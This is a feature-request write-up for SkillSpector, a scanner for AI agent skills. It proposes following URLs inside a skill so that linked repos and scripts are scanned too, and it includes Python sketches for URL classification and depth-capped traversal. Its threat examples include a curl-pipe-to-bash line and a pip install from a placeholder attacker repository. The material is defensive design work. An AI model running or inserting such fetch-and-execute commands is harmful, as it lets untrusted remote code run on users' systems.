Problem
SkillSpector currently resolves the top-level input once (resolve_input.py) and then scans only those local files. Any URLs or repository references found inside the scanned files are never followed — analysis stops at the boundary of the input skill.
This creates a blind spot for a realistic attack pattern: a skill that appears clean on its own but delegates execution to an external source at runtime.
Example vectors:
- A shell script in the skill bundle that runs curl https://external-host/setup.sh | bash: the URL is detected as a pattern, but if setup.sh itself contains the malicious payload, it is never scanned.
- A SKILL.md that references a companion repo (pip install git+https://github.com/attacker/lib): the companion repo's code is never analyzed.
- A skill that looks benign today but links to a repo the attacker controls and can update later (rug-pull via a dependency, not the skill itself).
The OSV.dev queries (osv_client.py) partially address this for named packages, but not for arbitrary Git URLs or raw script fetches.
Proposed feature
Add transitive link scanning as an optional pass after the primary scan:
- Extract candidate URLs from the scan results: collect all external URLs surfaced by existing analyzers (supply-chain, data-exfiltration, and taint-tracking findings already contain them), plus a lightweight pass over file_cache for https?:// references in Markdown links, curl/wget args, pip install git+, npm install, etc.
- Filter to scannable targets: only follow links that point to something SkillSpector already knows how to resolve, i.e. Git repo URLs, .zip archives, and raw .md/.sh/.py file URLs. Skip documentation, issue trackers, badges, etc.
- Recursive resolve_input with a visited set: clone/fetch each candidate into a temp dir, run the full analyzer graph on it, and merge findings back into the parent report with a transitive_depth field on each finding so the output clearly distinguishes direct vs. transitive results.
- Depth + domain allow/deny list controls: cap recursion depth (e.g. --transitive-depth 1 default, --transitive-depth 2 opt-in) and let users configure trusted domains to skip (e.g. github.com/myorg/*).
- CLI flag: opt-in via --transitive (off by default to preserve current behavior and scan time).
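The first two steps (extract, then filter) can be sketched as below. This is only an illustration under stated assumptions: extract_urls, classify, and GIT_HOSTS are hypothetical names, not existing SkillSpector code, and the host list and suffix rules are placeholders for whatever resolve_input.py actually accepts.

```python
import re
from typing import Optional
from urllib.parse import urlparse

# Hypothetical helpers; none of these names exist in SkillSpector today.
URL_RE = re.compile(r"""https?://[^\s"'<>)\]]+""")

# Assumed set of hosts where a two-segment path (owner/repo) means a Git repo.
GIT_HOSTS = {"github.com", "gitlab.com", "bitbucket.org"}


def extract_urls(text: str) -> list[str]:
    """Return unique URLs in order of first appearance, trailing punctuation stripped."""
    seen: dict[str, None] = {}
    for match in URL_RE.finditer(text):
        url = match.group(0).rstrip(".,;:")
        seen.setdefault(url, None)
    return list(seen)


def classify(url: str) -> Optional[str]:
    """Return 'git', 'archive', 'file', or None when the URL should not be followed."""
    parsed = urlparse(url)
    path = parsed.path.rstrip("/")
    segments = [s for s in path.split("/") if s]
    if path.endswith(".git"):
        return "git"
    if path.endswith(".zip"):
        return "archive"
    if path.endswith((".md", ".sh", ".py")):
        return "file"
    host = (parsed.hostname or "").lower()
    # owner/repo on a known forge; deeper paths (issues, wiki, ...) are skipped
    if host in GIT_HOSTS and len(segments) == 2:
        return "git"
    return None


sample = (
    "curl https://external-host/setup.sh | bash\n"
    "pip install git+https://github.com/attacker/lib\n"
    "See https://github.com/attacker/lib/issues/3.\n"
)
targets = [(u, classify(u)) for u in extract_urls(sample)]
```

In this sketch the issue-tracker link is extracted but classified as None, so it would not be cloned or fetched.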
Why it fits the existing architecture
- resolve_input.py already handles Git URLs, zips, raw file URLs, and directories, so transitive scanning reuses that exact logic.
- The analyzer registry is already a pure fan-out; running it on a second skill path requires no graph changes.
- Findings from transitive targets can be added to the same findings list with a source_url / transitive_depth annotation, so meta_analyzer and report nodes are unaffected.
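A minimal sketch of how the depth-capped traversal and the finding annotations could fit together. The Finding dataclass, scan_transitive, and the scan / is_trusted callables are all hypothetical stand-ins; in particular, scan(target) is assumed to wrap "resolve the target, run every analyzer, return the findings plus outgoing scannable URLs", which is not an existing SkillSpector function.

```python
from dataclasses import dataclass
from typing import Callable, Optional


@dataclass
class Finding:
    # Hypothetical shape; the real finding type may differ.
    rule_id: str
    message: str
    source_url: Optional[str] = None  # None for findings from the top-level skill
    transitive_depth: int = 0         # 0 = direct, 1+ = reached through links


def scan_transitive(
    root: str,
    scan: Callable[[str], tuple[list[Finding], list[str]]],
    max_depth: int = 1,
    is_trusted: Callable[[str], bool] = lambda url: False,
) -> list[Finding]:
    """Breadth-first walk over linked targets with a visited set and a depth cap."""
    findings: list[Finding] = []
    visited = {root}
    frontier = [root]
    for depth in range(max_depth + 1):
        next_frontier: list[str] = []
        for target in frontier:
            found, links = scan(target)
            for finding in found:
                # Annotate so reports can separate direct from transitive results.
                finding.transitive_depth = depth
                finding.source_url = None if depth == 0 else target
                findings.append(finding)
            if depth == max_depth:
                continue  # depth cap reached: do not follow links any further
            for url in links:
                if url in visited or is_trusted(url):
                    continue  # already scanned, or on the user's trusted list
                visited.add(url)
                next_frontier.append(url)
        frontier = next_frontier
    return findings
```

The visited set is what keeps two skills that link to each other from looping, and the trusted check runs before a target is ever fetched.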
Acceptance criteria
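- skillspector scan <skill> --transitive clones/fetches external repo/file links found in the skill and runs the full analyzer suite on each
- Transitive findings are distinguishable from direct findings in the output (ruleId prefix or properties, Markdown section)
- Behavior without the flag (no --transitive) is unchanged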
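The opt-in flag and depth cap from the proposal could be wired up roughly as follows. This sketch assumes an argparse-based CLI, which may not match how SkillSpector actually parses arguments; only the flag names --transitive and --transitive-depth come from the proposal, and build_parser is a hypothetical helper.

```python
import argparse


def build_parser() -> argparse.ArgumentParser:
    """Hypothetical parser showing the proposed flags; not the real CLI."""
    parser = argparse.ArgumentParser(prog="skillspector")
    sub = parser.add_subparsers(dest="command", required=True)
    scan = sub.add_parser("scan")
    scan.add_argument("skill")
    # Off by default so existing invocations behave exactly as before.
    scan.add_argument("--transitive", action="store_true",
                      help="follow scannable links found in the skill")
    scan.add_argument("--transitive-depth", type=int, default=1,
                      help="maximum link depth to follow (default: 1)")
    return parser


default_args = build_parser().parse_args(["scan", "./my-skill"])
deep_args = build_parser().parse_args(
    ["scan", "./my-skill", "--transitive", "--transitive-depth", "2"]
)
```

With no flags, default_args.transitive is False, so the transitive pass would be skipped entirely.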